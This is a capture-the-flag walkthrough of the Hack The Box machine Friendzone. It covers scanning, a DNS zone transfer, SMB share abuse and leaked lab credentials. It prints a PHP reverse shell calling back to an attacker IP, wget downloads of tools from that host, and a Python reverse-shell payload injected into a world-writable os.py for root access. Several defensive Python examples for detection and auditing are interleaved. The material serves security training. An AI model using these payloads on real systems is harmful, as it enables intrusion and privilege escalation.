Hack The Box: Friendzone Write-up (#17)

Reconnaissance

nmap -sC -sV -O -p- -oA nmap/full 10.10.10.123
  • -sC: Default Nmap script
  • -sV: Service/version info
  • -O: Enable OS detection
  • -oA: Output scan results in 3 different formats
  • -p-: Scan all ports from 1–65535
  • Port 21: Running FTP service, vsftpd 3.0.3.
  • Port 22: Running SSH service, OpenSSH 7.6p1 Ubuntu 4.
  • Port 53: Running DNS service, ISC BIND 9.11.3-1ubuntu1.2.
  • Port 80: Running HTTP service, Apache httpd 2.4.29 ((Debian)).
  • Port 139: Running Samba smbd 3.X - 4.X.
  • Port 443: Running HTTPS service, Apache httpd 2.4.29 ((Debian)).
  • Port 445: Running Samba smbd 4.7.6-Ubuntu.
Nmap scan report for ip-10-10-10-123.ap-southeast-1.compute.internal (10.10.10.123)
Host is up (0.0096s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
nmap -sU -O --top-ports=100 -oA nmap/udp-top100 10.10.10.123
  • -sU: UDP scan
  • Port 53: Running DNS service.
  • Port 137: Running NetBIOS service.
Nmap scan report for ip-10-10-10-123.ap-southeast-1.compute.internal (10.10.10.123)
Host is up (0.010s latency).
Not shown: 97 closed ports
PORT STATE SERVICE
53/udp open domain
137/udp open netbios-ns
138/udp open|filtered netbios-dgm
  1. Port 21 (FTP, vsftpd 3.0.3) and Port 22 (SSH, OpenSSH 7.6p1) have no known vulnerabilities. If we find any credentials during enumeration, we will use them to access these services.
  2. Port 53 is a DNS service. We can enumerate it to find possible subdomains, if there are any. If there are, we will have more URLs to enumerate.
  3. Ports 80 and 443 are web services. We need to map the host's domain name to its IP address in our Kali Linux /etc/hosts file. Then we brute force the directories.
  4. Ports 139 and 445 belong to the Samba service. We will enumerate it to find whether any shares are accessible. If there are, we enumerate them further to find sensitive information.
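The port-by-port summary above was written by hand from the nmap output. The following Python is an added example (not part of the original write-up) that produces the same kind of summary from nmap's normal (-oN) output and also flags two things a reviewer would want to see: the expired TLS certificate and the mismatch between the scanned hostname and the certificate's commonName, which is why friendzone.red has to be added to /etc/hosts. The sample text is the write-up's own scan output, embedded so the script runs offline; the scan date passed to findings() is assumed.

```python
import re
from datetime import datetime

# Sample input: the service lines from the write-up's nmap -oN output, embedded so the
# parser runs offline. Replace with open("nmap/full.nmap").read() for a real scan file.
NMAP_OUTPUT = """\
Nmap scan report for ip-10-10-10-123.ap-southeast-1.compute.internal (10.10.10.123)
Host is up (0.0096s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
"""

HOST_RE = re.compile(r"^Nmap scan report for (?P<name>\S+)(?: \((?P<ip>[\d.]+)\))?$")
PORT_RE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s*(?P<version>.*)$")
CERT_CN_RE = re.compile(r"ssl-cert: Subject: commonName=(?P<cn>[^/\s]+)")
CERT_EXPIRY_RE = re.compile(r"Not valid after:\s+(?P<ts>\S+)")


def parse_nmap(text):
    """Parse nmap normal output into (host, services, cert).

    host: {"name": ..., "ip": ...}; services: one dict per port line;
    cert: commonName and expiry taken from the ssl-cert script block.
    """
    host, services, cert = {}, [], {}
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = {"name": m.group("name"), "ip": m.group("ip") or m.group("name")}
            continue
        m = PORT_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["port"] = int(rec["port"])
            rec["version"] = rec["version"].strip()
            services.append(rec)
            continue
        # Script output lines start with '|' and belong to the port listed just before them.
        m = CERT_CN_RE.search(line)
        if m:
            cert["cn"] = m.group("cn")
        m = CERT_EXPIRY_RE.search(line)
        if m:
            cert["not_after"] = datetime.fromisoformat(m.group("ts"))
    return host, services, cert


def findings(text, scan_date):
    """Summarise open ports and flag an expired certificate or a certificate name that
    differs from the scanned host. scan_date is 'YYYY-MM-DD' (assumed here, not from the scan)."""
    host, services, cert = parse_nmap(text)
    when = datetime.strptime(scan_date, "%Y-%m-%d")
    notes = [f"{s['port']}/{s['proto']} {s['service']}: {s['version'] or 'unknown version'}"
             for s in services if s["state"] == "open"]
    if "not_after" in cert and cert["not_after"] < when:
        notes.append(f"TLS certificate for {cert.get('cn', '?')} expired on "
                     f"{cert['not_after'].date()}")
    if cert.get("cn") and cert["cn"] != host.get("name"):
        notes.append(f"certificate name {cert['cn']} differs from scanned host "
                     f"{host.get('name')}; map it in /etc/hosts: {host.get('ip')} {cert['cn']}")
    return notes


if __name__ == "__main__":
    for note in findings(NMAP_OUTPUT, "2020-09-03"):
        print(note)
```

The certificate check is the detail the raw output buries: the cert expired on 2018-11-04, almost two years before this scan, which is worth recording in a report on its own.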

Service Enumeration

10.10.10.123    friendzone.red

Port 139,445 (Samba Service)

enum4linux -a 10.10.10.123
smbmap -H 10.10.10.123
  • -H: Target IP
smbmap -H 10.10.10.123 -R --depth 5
root@kali:/htb/Friendzone# smbclient //10.10.10.123/general
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (1.6 KiloBytes/sec) (average 1.6 KiloBytes/sec)
smb: \> exit
root@kali:/htb/Friendzone# cat creds.txt 
creds for the admin THING:
admin:WORKWORKHhallelujah@#

Port 80 (HTTP)

10.10.10.123    friendzone.red friendzoneportal.red

Port 443 (HTTPS Web Service)

Port 53 (DNS Service)

dig axfr @10.10.10.123 friendzone.red
10.10.10.123    admin.friendzoneportal.red administrator1.friendzone.red files.friendzoneportal.red friendzoneportal.red friendzone.red hr.friendzone.red imports.friendzoneportal.red uploads.friendzone.red vpn.friendzoneportal.red
https://admin.friendzoneportal.red
https://administrator1.friendzone.red
https://files.friendzoneportal.red
https://friendzoneportal.red
https://friendzone.red
https://hr.friendzone.red
https://imports.friendzoneportal.red
https://uploads.friendzone.red
https://vpn.friendzoneportal.red
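The zone transfer above handed over every hostname in both zones in one query. From the defender's side, a server that allows AXFR from anyone logs each transfer, so the event is easy to detect. The following Python is an added example (not part of the original write-up) that runs a simple detection over constructed log lines in the shape of BIND's xfer-out category (the exact format is an assumption about the logging channel; adjust AXFR_RE for your deployment). 10.10.10.124 plays the role of a hypothetical authorised secondary; 10.10.14.10 is the attacking host used throughout the write-up.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not real server logs). The serial number and the
# secondary's address are invented for the example.
LOG_LINES = [
    "03-Sep-2020 08:55:01.412 xfer-out: info: client 10.10.10.124#54321 (friendzone.red): "
    "transfer of 'friendzone.red/IN': AXFR started (serial 2018100501)",
    "03-Sep-2020 08:55:01.418 xfer-out: info: client 10.10.10.124#54321 (friendzone.red): "
    "transfer of 'friendzone.red/IN': AXFR ended",
    "03-Sep-2020 08:59:12.004 xfer-out: info: client 10.10.14.10#41234 (friendzone.red): "
    "transfer of 'friendzone.red/IN': AXFR started (serial 2018100501)",
    "03-Sep-2020 08:59:12.011 xfer-out: info: client 10.10.14.10#41234 (friendzone.red): "
    "transfer of 'friendzone.red/IN': AXFR ended",
    "03-Sep-2020 08:59:20.230 xfer-out: info: client 10.10.14.10#41240 (friendzoneportal.red): "
    "transfer of 'friendzoneportal.red/IN': AXFR started (serial 2018100501)",
    "03-Sep-2020 09:01:00.000 queries: info: client 10.10.14.10#41250 (friendzone.red): "
    "query: friendzone.red IN A +",
]

# Matches the 'AXFR started' line only, so each transfer is counted once and ordinary
# queries are ignored.
AXFR_RE = re.compile(
    r"client (?P<ip>\d{1,3}(?:\.\d{1,3}){3})#\d+ \(\S+\): "
    r"transfer of '(?P<zone>[^/']+)/IN': AXFR started"
)

# Hypothetical allow-list: the only hosts that should ever pull a full zone.
AUTHORISED_SECONDARIES = {"10.10.10.124"}


def unauthorised_transfers(lines, allowed=AUTHORISED_SECONDARIES):
    """Return [(source_ip, zone), ...] for every zone transfer started by a host
    that is not an authorised secondary."""
    hits = []
    for line in lines:
        m = AXFR_RE.search(line)
        if m and m.group("ip") not in allowed:
            hits.append((m.group("ip"), m.group("zone")))
    return hits


def zones_per_source(hits):
    """Group flagged transfers by source so one address pulling several zones stands out."""
    by_ip = defaultdict(set)
    for ip, zone in hits:
        by_ip[ip].add(zone)
    return {ip: sorted(zones) for ip, zones in by_ip.items()}


if __name__ == "__main__":
    flagged = unauthorised_transfers(LOG_LINES)
    for ip, zones in zones_per_source(flagged).items():
        print(f"{ip} transferred zones: {', '.join(zones)}")
```

Detection is the fallback; the fix on the server is to restrict transfers in named.conf with allow-transfer limited to the secondaries (and to authenticate them with TSIG), after which the dig axfr used above is refused rather than answered.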
cat hosts.txt | aquatone
aquatone v1.7.0 started at 2020-09-03T08:59:18+08:00
Targets    : 9
Threads : 4
Ports : 80, 443, 8000, 8080, 8443
Output dir : .
https://imports.friendzoneportal.red: 404 Not Found
https://friendzone.red: 200 OK
https://administrator1.friendzone.red: 200 OK
https://admin.friendzoneportal.red: 200 OK
https://hr.friendzone.red: 404 Not Found
https://vpn.friendzoneportal.red: 404 Not Found
https://uploads.friendzone.red: 200 OK
https://files.friendzoneportal.red: 404 Not Found
https://friendzoneportal.red: 200 OK
https://imports.friendzoneportal.red: screenshot successful
https://admin.friendzoneportal.red: screenshot successful
https://administrator1.friendzone.red: screenshot successful
https://friendzone.red: screenshot successful
https://vpn.friendzoneportal.red: screenshot successful
https://hr.friendzone.red: screenshot successful
https://files.friendzoneportal.red: screenshot successful
https://uploads.friendzone.red: screenshot successful
https://friendzoneportal.red: screenshot successful
Calculating page structures... done
Clustering similar pages... done
Generating HTML report... done
Writing session file...
Time:
- Started at : 2020-09-03T08:59:18+08:00
- Finished at : 2020-09-03T08:59:24+08:00
- Duration : 7s
Requests:
- Successful : 9
- Failed : 0
- 2xx : 5
- 3xx : 0
- 4xx : 4
- 5xx : 0
Screenshots:
- Successful : 9
- Failed : 0
Wrote HTML report to: aquatone_report.html
python3 -m http.server 80
  1. https://admin.friendzoneportal.red
  2. https://administrator1.friendzone.red
  3. https://uploads.friendzone.red
root@kali:/htb/Friendzone# cat test.php 
<?php phpinfo() ?>
root@kali:/htb/Friendzone# smbclient //10.10.10.123/Development
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> put test.php
putting file test.php as \test.php (0.6 kb/s) (average 0.6 kb/s)
smb: \>
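The Samba enumeration above shows two separate weaknesses: the general share could be read without credentials (creds.txt), and the Development share could be written to without credentials (test.php). Both come down to share options in smb.conf. The following Python is an added example (not part of the original write-up) that audits an smb.conf fragment for shares that are reachable anonymously and reports whether they are readable or writable. The share names come from the page; the paths, group names and option values are constructed assumptions, not the machine's real configuration.

```python
import configparser

# Constructed smb.conf fragment that reproduces the two findings: anonymous read on
# 'general' and anonymous write on 'Development'. Paths and users are invented.
SMB_CONF_WEAK = """\
[global]
workgroup = WORKGROUP
map to guest = Bad User

[general]
path = /srv/samba/general
browseable = yes
guest ok = yes
read only = yes

[Development]
path = /srv/samba/Development
browseable = yes
guest ok = yes
writable = yes
"""

# Corrected fragment: no guest access anywhere, write access only for an authenticated group.
SMB_CONF_FIXED = """\
[global]
workgroup = WORKGROUP
map to guest = Never

[general]
path = /srv/samba/general
browseable = yes
guest ok = no
valid users = @staff
read only = yes

[Development]
path = /srv/samba/Development
browseable = no
guest ok = no
valid users = @developers
read only = no
create mask = 0660
"""

TRUE_VALUES = {"yes", "true", "1"}


def _yes(section, *keys):
    """True if any of the given (synonymous) Samba parameters is set to a true value."""
    return any(k in section and section[k].strip().lower() in TRUE_VALUES for k in keys)


def share_flags(section):
    """Return (guest_accessible, writable) for one share section.

    Samba's default is read-only; 'writable'/'writeable' = yes or 'read only' = no opens it up.
    """
    writable = _yes(section, "writable", "writeable") or (
        "read only" in section and section["read only"].strip().lower() not in TRUE_VALUES)
    guest = _yes(section, "guest ok", "public")
    return guest, writable


def risky_shares(conf_text):
    """Return [(share, verdict)] for every share reachable without credentials."""
    # smb.conf is INI-like; keys must not be indented for configparser to see them as keys.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(conf_text)
    out = []
    for name in cp.sections():
        if name in ("global", "printers", "print$"):
            continue
        guest, writable = share_flags(cp[name])
        if guest and writable:
            out.append((name, "anonymous write"))
        elif guest:
            out.append((name, "anonymous read"))
    return out


if __name__ == "__main__":
    print("weak :", risky_shares(SMB_CONF_WEAK))
    print("fixed:", risky_shares(SMB_CONF_FIXED))
```

An anonymous-write share is the more serious of the two: once any server-side code can be made to read from that path, an uploaded file such as test.php becomes code execution, which is exactly what the Exploitation section below relies on.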

Exploitation

root@kali:/htb/Friendzone# cp /usr/share/webshells/php/php-reverse-shell.php .
root@kali:/htb/Friendzone# mv php-reverse-shell.php reverse.php
root@kali:/htb/Friendzone# cat revese.php 
<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.10'; // CHANGE THIS
$port = 53; // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
smb: \> put reverse.php
putting file reverse.php as \revese.php (78.6 kb/s) (average 45.9 kb/s)
root@kali:/htb/Friendzone# nc -nlvp 53
listening on [any] 53 ...
python -c 'import pty;pty.spawn("/bin/bash")'
stty raw -echo;fg
export TERM=xterm

Post-Exploitation Enumeration

www-data@FriendZone:/tmp$ find / -name user.txt -type f 2>/dev/null
/home/friend/user.txt
www-data@FriendZone:/tmp$ ls -l /home/friend/user.txt
-r--r--r-- 1 root root 33 Oct 6 2018 /home/friend/user.txt
www-data@FriendZone:/var/www$ cat mysql_data.conf 
for development process this is the mysql creds for user friend
db_user=friend
db_pass=Agpyu12!0.213$
db_name=FZ

#1 Privilege Escalation

root@kali:/opt/LinEnum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
friend@FriendZone:/tmp$ wget http://10.10.14.10/lse.sh
--2020-08-31 07:31:51-- http://10.10.14.10/lse.sh
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46631 (46K) [text/x-sh]
Saving to: ‘lse.sh’
lse.sh 100%[=====================>] 45.54K --.-KB/s in 0.02s
2020-08-31 07:31:51 (2.67 MB/s) - ‘lse.sh’ saved [46631/46631]
bash lse.sh -l 1 -i
  • -l: Level of details
  • -i: Non-interactive mode
friend@FriendZone:/tmp$ ls -l /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
friend@FriendZone:/tmp$ wget http://10.10.14.10/pspy64
--2020-09-03 08:51:47-- http://10.10.14.10/pspy64
Connecting to 10.10.14.10:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================>] 2.94M 10.0MB/s in 0.3s
2020-09-03 08:51:47 (10.0 MB/s) - ‘pspy64’ saved [3078592/3078592]
chmod +x pspy64
./pspy64
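The finding that decides this box is the ls -l above: /usr/lib/python2.7/os.py is mode 777, so any local user can edit a module that every Python process, including root's scheduled jobs, imports. The following Python is an added example (not part of the original write-up) of the defender's side of that check: walk a directory tree and report anything world-writable, with a helper that audits the interpreter's own import path. The demo builds a throwaway tree with one file permissioned like the os.py found here; the file names and contents are constructed.

```python
import os
import stat
import sys
import tempfile


def world_writable(path):
    """True if the file's or directory's own mode grants write to 'others' (the o+w bit)."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return False  # a symlink's own mode is meaningless; its target is visited by the walk
    return bool(st.st_mode & stat.S_IWOTH)


def audit_tree(root):
    """Walk root and return every path under it that is world-writable, sorted."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if world_writable(path):
                hits.append(path)
    return sorted(hits)


def audit_python_libs(roots=None):
    """Audit the interpreter's import path (or the given roots).

    Anything reported here can be modified by any local user and will be executed by
    every process that imports it, root's cron jobs included.
    """
    if roots is None:
        roots = [p for p in sys.path if p and os.path.isdir(p)]
    results = {}
    for root in roots:
        hits = audit_tree(root)
        if hits:
            results[root] = hits
    return results


def demo():
    """Constructed scenario: one correctly permissioned module (0644) beside one that is
    0777, the mode the write-up found on /usr/lib/python2.7/os.py. Returns relative hits."""
    with tempfile.TemporaryDirectory() as tmp:
        lib = os.path.join(tmp, "python2.7")
        os.makedirs(lib)
        os.chmod(lib, 0o755)
        for name, mode in (("helper.py", 0o644), ("os.py", 0o777)):
            path = os.path.join(lib, name)
            with open(path, "w") as fh:
                fh.write("# constructed placeholder module\n")
            os.chmod(path, mode)
        return [os.path.relpath(p, tmp) for p in audit_tree(tmp)]


if __name__ == "__main__":
    print("demo tree:", demo())
    for root, hits in audit_python_libs().items():
        print(root)
        for h in hits:
            print("  ", h)
```

The check reads mode bits with lstat rather than testing os.access, so it gives the same answer whether it is run as root or as an unprivileged user, and it reports directories as well as files, since a world-writable library directory lets a user drop a new module even when every existing file is locked down.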

Privilege Escalation

...SNIP...
except NameError: # statvfs_result may not exist
pass
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.10",53))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
import pty
pty.spawn("/bin/bash")
root@kali:/htb/Friendzone# nc -nlvp 53
listening on [any] 53 ...

Attack Strategy Map

Joshua Surendran